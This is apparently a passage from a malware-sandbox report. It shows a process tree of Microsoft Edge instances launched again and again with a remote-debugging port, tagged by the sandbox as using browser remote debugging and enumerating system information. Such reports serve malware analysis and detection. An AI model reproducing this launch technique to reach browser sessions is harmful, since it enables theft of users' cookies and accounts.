                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2076,17044531682380679113,10741572317609847880,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2908 /prefetch:1
                                                                                        5⤵
                                                                                        • Uses browser remote debugging
                                                                                        PID:5792
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,17044531682380679113,10741572317609847880,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2
                                                                                        5⤵
                                                                                          PID:4208
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,17044531682380679113,10741572317609847880,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:2
                                                                                          5⤵
                                                                                            PID:6484
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,17044531682380679113,10741572317609847880,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3852 /prefetch:2
                                                                                            5⤵
                                                                                              PID:720
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,17044531682380679113,10741572317609847880,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4916 /prefetch:2
                                                                                              5⤵
                                                                                                PID:4888
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2076,17044531682380679113,10741572317609847880,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3736 /prefetch:1
                                                                                                5⤵
                                                                                                • Uses browser remote debugging
                                                                                                PID:4284
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2076,17044531682380679113,10741572317609847880,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4924 /prefetch:1
                                                                                                5⤵
                                                                                                • Uses browser remote debugging
                                                                                                PID:5496
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,17044531682380679113,10741572317609847880,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3612 /prefetch:2
                                                                                                5⤵
                                                                                                  PID:6100
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,17044531682380679113,10741572317609847880,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4824 /prefetch:2
                                                                                                  5⤵
                                                                                                    PID:5164
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,17044531682380679113,10741572317609847880,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3840 /prefetch:2
                                                                                                    5⤵
                                                                                                      PID:4384
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,17044531682380679113,10741572317609847880,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4116 /prefetch:2
                                                                                                      5⤵
                                                                                                        PID:5148
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                      4⤵
                                                                                                      • Uses browser remote debugging
                                                                                                      • Enumerates system info in registry
                                                                                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                      PID:6592
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ffad7d846f8,0x7ffad7d84708,0x7ffad7d84718
                                                                                                        5⤵
                                                                                                        • Checks processor information in registry
                                                                                                        • Enumerates system info in registry
                                                                                                        PID:6576
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,11526238781530854102,606691523190197639,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
                                                                                                        5⤵
                                                                                                          PID:2544
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,11526238781530854102,606691523190197639,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2472 /prefetch:3
                                                                                                          5⤵
                                                                                                            PID:6976
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,11526238781530854102,606691523190197639,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2904 /prefetch:8
                                                                                                            5⤵
                                                                                                              PID:6904
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2116,11526238781530854102,606691523190197639,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3488 /prefetch:1
                                                                                                              5⤵
                                                                                                              • Uses browser remote debugging
                                                                                                              PID:4252
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2116,11526238781530854102,606691523190197639,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3500 /prefetch:1
                                                                                                              5⤵
                                                                                                              • Uses browser remote debugging
                                                                                                              PID:6940
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,11526238781530854102,606691523190197639,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
                                                                                                              5⤵
                                                                                                                PID:888
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,11526238781530854102,606691523190197639,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
                                                                                                                5⤵
                                                                                                                  PID:1476
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,11526238781530854102,606691523190197639,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2500 /prefetch:2
                                                                                                                  5⤵
                                                                                                                    PID:5092
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,11526238781530854102,606691523190197639,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2304 /prefetch:2
                                                                                                                    5⤵
                                                                                                                      PID:5772
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2116,11526238781530854102,606691523190197639,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:1
                                                                                                                      5⤵
                                                                                                                      • Uses browser remote debugging
                                                                                                                      PID:5228
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2116,11526238781530854102,606691523190197639,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3896 /prefetch:1
                                                                                                                      5⤵
                                                                                                                      • Uses browser remote debugging
                                                                                                                      PID:7112
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,11526238781530854102,606691523190197639,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4852 /prefetch:2
                                                                                                                      5⤵
                                                                                                                        PID:4256
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,11526238781530854102,606691523190197639,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2484 /prefetch:2
                                                                                                                        5⤵
                                                                                                                          PID:636
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,11526238781530854102,606691523190197639,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3756 /prefetch:2
                                                                                                                          5⤵
                                                                                                                            PID:792
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,11526238781530854102,606691523190197639,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=5112 /prefetch:2
                                                                                                                            5⤵
                                                                                                                              PID:2928
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                            4⤵
                                                                                                                            • Uses browser remote debugging
                                                                                                                            • Enumerates system info in registry
                                                                                                                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                            PID:856
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffad7d846f8,0x7ffad7d84708,0x7ffad7d84718
                                                                                                                              5⤵
                                                                                                                              • Checks processor information in registry
                                                                                                                              • Enumerates system info in registry
                                                                                                                              PID:1228
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2244,11213457285478480972,15621452864545561941,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2260 /prefetch:2
                                                                                                                              5⤵
                                                                                                                                PID:4628
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2244,11213457285478480972,15621452864545561941,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 /prefetch:3
                                                                                                                                5⤵
                                                                                                                                  PID:4840
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2244,11213457285478480972,15621452864545561941,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2976 /prefetch:8
                                                                                                                                  5⤵
                                                                                                                                    PID:5652
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2244,11213457285478480972,15621452864545561941,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3576 /prefetch:1
                                                                                                                                    5⤵
                                                                                                                                    • Uses browser remote debugging
                                                                                                                                    PID:880
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2244,11213457285478480972,15621452864545561941,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3584 /prefetch:1
                                                                                                                                    5⤵
                                                                                                                                    • Uses browser remote debugging
                                                                                                                                    PID:6408
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2244,11213457285478480972,15621452864545561941,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2280 /prefetch:2
                                                                                                                                    5⤵
                                                                                                                                      PID:5384
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2244,11213457285478480972,15621452864545561941,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2240 /prefetch:2
                                                                                                                                      5⤵
                                                                                                                                        PID:6308
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2244,11213457285478480972,15621452864545561941,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2936 /prefetch:2
                                                                                                                                        5⤵
                                                                                                                                          PID:3956
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2244,11213457285478480972,15621452864545561941,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4816 /prefetch:2
                                                                                                                                          5⤵
                                                                                                                                            PID:3168
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
